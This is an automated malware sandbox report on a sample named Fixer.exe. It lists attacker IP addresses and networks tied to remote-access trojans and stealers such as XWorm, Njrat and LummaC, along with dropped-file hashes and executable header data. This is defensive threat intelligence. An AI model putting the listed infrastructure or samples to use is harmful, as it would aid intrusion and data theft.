147.185.221.24 | avaydna.exe | malicious | Njrat |
147.185.221.24 | ddos tool.exe | malicious | XWorm |
147.185.221.24 | L988Ph5sKX.exe | malicious | XWorm |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MAXITEL-ASRU | T4qO1i2Jav.exe | malicious | LummaC Stealer | 89.23.100.42
MAXITEL-ASRU | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | bPkG0wTVon.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | itLDZwgFNE.exe | malicious | Flesh Stealer | 89.23.100.233
MAXITEL-ASRU | 3gJQoqWpxb.bat | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | 7fE6IkvYWf.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | iGxCM2I5u9.exe | malicious | Flesh Stealer | 89.23.100.233
SALSGIVERUS | spreadmalware.exe | malicious | XWorm | 147.185.221.24
SALSGIVERUS | 7fqul5Zr8Y.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | miori.arm.elf | malicious | Unknown | 147.168.252.34
SALSGIVERUS | miori.m68k.elf | malicious | Unknown | 147.184.86.253
SALSGIVERUS | loader.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | loader.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | My33xbeYIX.exe | malicious | Njrat | 147.185.221.16
SALSGIVERUS | YPzNsfg4nR.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | sela.exe | malicious | Njrat | 147.185.221.17
SALSGIVERUS | P3A946MOFP.exe | malicious | XWorm | 147.185.221.24
No context
No context
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1769756568540544
Encrypted: false
SSDEEP: 384:mqF4nYPLpFYaGbaiOUWRzuiFcXY4lO8Cv:mqF4OLpFYaqaCgzuiFcXY4lO8I
MD5: 8B9112DC2D6DB613F27A0A9E42160C23
SHA1: 6E5C9313990CD6775B1641704ADB7B9765D2A5A7
SHA-256: D75DE7E24157AC5E659DD668993D430D160631CA9836E54D798DE0FA4CD8C9E1
SHA-512: B9EA9AC22365331C19E2D6A108030B69AF55822629E013026F2C1AD41E74A4D1382022512A906491282A0620972D8365C4D19F00DCECDF9F23A304C8236C11CD
Malicious: false
Preview:Version=1 EventType=CLR20r3 EventTime=133808049355386477 ReportType=2 Consent=1 UploadTime=133808049371011485 ReportStatus=524384 ReportIdentifier=8d388940-38df-4e28-ac5d-2484feb1998d IntegratorReportIdentifier=22971e9b-1d89-4dee-9b58-62c79cceb567 Wow64Host=34404 NsAppName=Defender.exe OriginalFilename=explorer AppSessionGuid=00000694-0001-0014-c481-b83fb661db01 TargetAppId=W:0006db2d2262116274798dd22999371d9c5600000000!00006f0469cf9cdd0146e87cc4bd6c03038eab0279a9!Defender.exe Tar
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.1704496957934285
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:x5W4nAPLpFYaGbaJVx4tzuiFcXY4lO8Cv:x5W4GLpFYaqaN6zuiFcXY4lO8I
                                                                                                                                                                                                                                          MD5:3E1654901960FFA6658E27618B96418D
                                                                                                                                                                                                                                          SHA1:C052EB04DA6FF382FA9785FFAC8497681F1A9E7B
                                                                                                                                                                                                                                          SHA-256:72947DB36F2B806D539A6D2C6545CD776132F414B13B06621FD34A789D687AA8
                                                                                                                                                                                                                                          SHA-512:C80CF4AA85BCBA6FECC039A052470C8F06F4644C456E7A6B3F3C9F137D72E38DBEE52D1E8E1490ACCA72030A3FBC11F1BC3A5A31902181EA31635AC774F7B583
                                                                                                                                                                                                                                          Malicious:false
Preview:Version=1 EventType=CLR20r3 EventTime=133808049638856197 ReportType=2 Consent=1 UploadTime=133808049653231156 ReportStatus=524384 ReportIdentifier=ad190060-6d63-4299-b661-3ffd29efd1e8 IntegratorReportIdentifier=c34d93c8-9535-404f-98e8-26b89f6687b6 Wow64Host=34404 NsAppName=Defender.exe OriginalFilename=explorer AppSessionGuid=000010bc-0001-0014-b7ea-4f51b661db01 TargetAppId=W:0006db2d2262116274798dd22999371d9c5600000000!00006f0469cf9cdd0146e87cc4bd6c03038eab0279a9!Defender.exe Tar
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Wed Jan 8 10:16:04 2025, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):383752
                                                                                                                                                                                                                                          Entropy (8bit):3.600510482890374
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:lbAr62gPk/w4hBAOccSZMPFE4Gxo11qRpcimC1CCqYNFx3+vI6pbGzj:xc62gfZOIZM9E4Gxo12pcDgq23QHFGv
                                                                                                                                                                                                                                          MD5:17E7B740472620A30291E62573CC3B3F
                                                                                                                                                                                                                                          SHA1:C70EB4C7F4C410B7671542DBE29547001A6D2E14
                                                                                                                                                                                                                                          SHA-256:79D5468F618DDE782BB5B68AAF70A3646FB4C9C37C38B401977C7236827E719F
                                                                                                                                                                                                                                          SHA-512:47C88EE6BDFD16F2ED2C01FB03C3E800AE1848000B6D92750AE32FC05F7D3D06B97FF5DDD0CC07BF81C5823611391F366520573107A3DE0B075744A0EED1F7F3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8804
                                                                                                                                                                                                                                          Entropy (8bit):3.6990628577232862
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJEIFo6YEhN7XgmfZ8lAmprRC89bsIMf0t6Em:R6lXJj66YEL7gmfuld7sjfko
                                                                                                                                                                                                                                          MD5:2E28945C273B14C4486596833B6FCB49
                                                                                                                                                                                                                                          SHA1:E4A03CDD202FA05CB894D0E19B58D5C464F9F5E1
                                                                                                                                                                                                                                          SHA-256:E8598E2963C5994E59A2C2EA5D18F51844C7CBD27C63889512344C27055184D8
                                                                                                                                                                                                                                          SHA-512:6AD9D1DE2FF70465161BD6FE36C3F7CEF0FCB4DA60C2236E4883C4D796DD26650CCF20EC8392CC25C987D671F00EF4533DBD6A015923354660504DEAC99CBB57
                                                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4284</Pi
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4809
                                                                                                                                                                                                                                          Entropy (8bit):4.460536081322174
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs4Jg771I961WpW8VYGPYm8M4JC0qnZ9Fsyq8vz0qnZulrquH6d:uIjf+I75E7VXSJC0KZUWz0KZuAuH6d
                                                                                                                                                                                                                                          MD5:5E2C748439DAFF5BEC5E5DB6A90A2850
                                                                                                                                                                                                                                          SHA1:FA72D899ECD9B2AD5A62816F24353308D564BCFA
                                                                                                                                                                                                                                          SHA-256:34FDBA698C6E85AD2A6D00C08BBE31C88B3FAD56D95D56489EFAC284491F4384
                                                                                                                                                                                                                                          SHA-512:BE8476907658E251072CA110CCE37734935B48A113872A8ED396E5903348F7677C4E78779DA4D6F0FAD595C1F8BC48F2233459ED425253929FA6F8399ADAFB7E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666798" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Wed Jan 8 10:15:35 2025, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):384850
                                                                                                                                                                                                                                          Entropy (8bit):3.5975398844191937
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:hCILbLAnoLM4Im5cS9PdR5uDHJco4HqRhoMkxP1CCqmiGv3+vdb2bTA:bLbsnDhmp91R5uDHJco4khov/q63QdUc
                                                                                                                                                                                                                                          MD5:DA7C806F194BF5325AC71EF023536247
                                                                                                                                                                                                                                          SHA1:0A8D22DE5873729984AA9FFD49747DD1967F7F7D
                                                                                                                                                                                                                                          SHA-256:79FC06D9B16BDC525032A87A62CB0EC15E680BE04DCD187680AA5306931D9AA9
                                                                                                                                                                                                                                          SHA-512:026952772C3CC543365BB6E62AD71D92A1C2446275A9B6855897720C492EB02FD64EEC776B4CBEAAFFF9B0542A8E0F34BC99ADA144708ED4FB8B6D24EC5E0EB4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8802
                                                                                                                                                                                                                                          Entropy (8bit):3.697588222399438
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJVuJio6YEhl7xgmfZ8lAmpr089b+ZEfKPjKm:R6lXJsT6YEDNgmfulV+6fKPv
                                                                                                                                                                                                                                          MD5:5C06E445B62C298C3A338A71B7ED453C
                                                                                                                                                                                                                                          SHA1:7B449E4BEB999205286BE5FCD44D9BFCD0C46868
                                                                                                                                                                                                                                          SHA-256:098C9236ED69632F18F4E79A1404C1C923FC32283E80763DB7A9D56DF300B432
                                                                                                                                                                                                                                          SHA-512:18316E09113EFC7C72AD62909781BBB1BC3E0C914727EF21C9B397238F30895D44B5149C41F4E79299A5406068D6DE073FA9DA5A3B312211E724E00C3FEE704D
                                                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1684</Pi
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4809
                                                                                                                                                                                                                                          Entropy (8bit):4.461145211989504
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs4Jg771I961WpW8VYIYm8M4JC0qnZ9Fmyq8vz0qnZ/lrquH8d:uIjf+I75E7VoJC0KZuWz0KZ/AuH8d
                                                                                                                                                                                                                                          MD5:007943515DF8E89DBAE0D37510666E12
                                                                                                                                                                                                                                          SHA1:B2409219E3BCE10E14CAF816258F6402C380618E
                                                                                                                                                                                                                                          SHA-256:ECBED3A2F98DFCCB79497BC0A2CC8270B1193F8C99DE0B70F014ACD9EB129CE3
                                                                                                                                                                                                                                          SHA-512:1531BCB5FC334C45DBF9521922799E19A6D72D7E72C1F6625E694AF7FFD8F608AC44C5CDCFCBCF37BBD0003630CE0E32F62BE898BE09B47AF3A5A3A03B7B4CE4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666798" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):443
                                                                                                                                                                                                                                          Entropy (8bit):5.347274615985407
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
                                                                                                                                                                                                                                          MD5:F73EF0CF34F9748349B7DC26D23369A1
                                                                                                                                                                                                                                          SHA1:9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
                                                                                                                                                                                                                                          SHA-256:6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
                                                                                                                                                                                                                                          SHA-512:C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):3094
                                                                                                                                                                                                                                          Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                          MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                                                                                          SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                                                                                          SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                                                                                          SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):471096
                                                                                                                                                                                                                                          Entropy (8bit):6.6645834957913985
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:G8qTx8oaV9Ta1UGwUVBRIYRrpyLvx5aatth:kaVVa+GwyHvlGv/jX
                                                                                                                                                                                                                                          MD5:83AB0FD4D723DF8D361E8AE748A01B21
                                                                                                                                                                                                                                          SHA1:DEFD49D2298BCD8A4E9D171061B15845DD689B3F
                                                                                                                                                                                                                                          SHA-256:0E73A04EC9945D13B86C8713D85B31CC2FC6A7010F9D2719DE7A6AD054FC3AE2
                                                                                                                                                                                                                                          SHA-512:5299F8A925C193DF061F570B869D4BAE15F8BF8D0873C2CC7EAA6B0A5B4ED73C8031D627D75B415E5C3F15390A5BA638EE232D8CF01EF8EEADB94A6AB5427CD4
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):398568
                                                                                                                                                                                                                                          Entropy (8bit):6.187865316789448
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:udqn92Oey3hWpanij1Ck6QQWFti9Ez2bDLujYzYm12JLXUsGytEqQ:uIn92O335ijomti9EzsOJL+UEq
                                                                                                                                                                                                                                          MD5:68A9294881810BC2CF709D03D710648D
                                                                                                                                                                                                                                          SHA1:7C8200CAF2A1A58FAB42936425DF7CC3B8378D49
                                                                                                                                                                                                                                          SHA-256:2B394B3A08381007F2121B096C08CE22CC9CA9085F0EE5E9CE931809D6F85FE5
                                                                                                                                                                                                                                          SHA-512:7C8143CA584819745C2625952E4EC9E668D02670C727E7F6AF09BA603C92B2369EF70C3AA2C3973D62CA574331A6B0C25F8D577B1F1FC08C3E0D33A307230EE9
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):750130408
                                                                                                                                                                                                                                          Entropy (8bit):0.007827226117135612
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                                                                          MD5:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          SHA1:317EEAB6C2474F22ABD152C5E1427974670AD5A0
                                                                                                                                                                                                                                          SHA-256:7E6F04675848A53E3F77B426F6C87876D683A8EF93AE8F78987C7C44FBA4B6F5
                                                                                                                                                                                                                                          SHA-512:0D76211440B429E4E31FBAAC79B8B8F905B9BDDA362AAE453825E88BE536059DDF079DB9E0E48645D83B13914DD4AF7C3220A8BC0A3057C6326D81F00A86659B
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                          Entropy (8bit):4.422082030578936
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:bSvfpi6ceLP/9skLmb0OTaWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw:GvloTaW+EZMM6DFyz03w
                                                                                                                                                                                                                                          MD5:88F3BA12B389176141D0C9E35D6A0C30
                                                                                                                                                                                                                                          SHA1:930B0050FF79758950AC23A0E280355E8B575ECE
                                                                                                                                                                                                                                          SHA-256:E66DE6153A2E3471DCC8BD98FB5A4F3C39C9644CD2921AECA7670FAC9F6C7EDC
                                                                                                                                                                                                                                          SHA-512:892C4C32FF5EF27F14CD336DBFC933EFDE55F08DB0A239C0E1028173B612A198296C9EDBAA204476C28E9CCC4DAF457A2B6A7FA826A7E3F9BE13A9D02D33FEF3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):5.081407378293017
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                          File name:Fixer.exe
                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                          MD5:2acda1f917022e9e8081ad69b15330c6
                                                                                                                                                                                                                                          SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
                                                                                                                                                                                                                                          SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
                                                                                                                                                                                                                                          SHA512:958b0298777807763a0abd44c7a9252838625a2cd73eda6537d7a453aa5ed434282dbec6a126899bb35912e1615fa4e77461a2c1b4f7912d91a35fb44b439d93
                                                                                                                                                                                                                                          SSDEEP:3072:icZqf7D34qp/0+mAGkyYaxQwgrRB1fA0PuTVAtkxza3R0eqiOL2bBOA:icZqf7DIqnm2lB1fA0GTV8kk8L
                                                                                                                                                                                                                                          TLSH:B5645A5833E8C910DA7F4775D861D67093B0BCA3A552E70B4FC4ACAB3D32740EA51AB6
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@................................
                                                                                                                                                                                                                                          Icon Hash:4d8ea38d85a38e6d
                                                                                                                                                                                                                                          Entrypoint:0x43029e
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30244 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x32000 | 0x1c9c6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x50000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2e2a4 | 0x2e400 | fde816a3b3ae0ecacd5e5ab05f73a727 | False | 0.47479413006756754 | data | 6.186366061893661 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x32000 | 0x1c9c6 | 0x1ca00 | a8cf3f8ff27a4a736ba8fb433d91107f | False | 0.2380765556768559 | data | 2.615031395625776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x50000 | 0xc | 0x200 | ad0a6b4525092f96ee7808055cdae654 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x32220 | 0x3d04 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9934058898847631
RT_ICON | 0x35f24 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m |  |  | 0.09013072282030049
RT_ICON | 0x4674c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m |  |  | 0.13905290505432216
RT_ICON | 0x4a974 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m |  |  | 0.17033195020746889
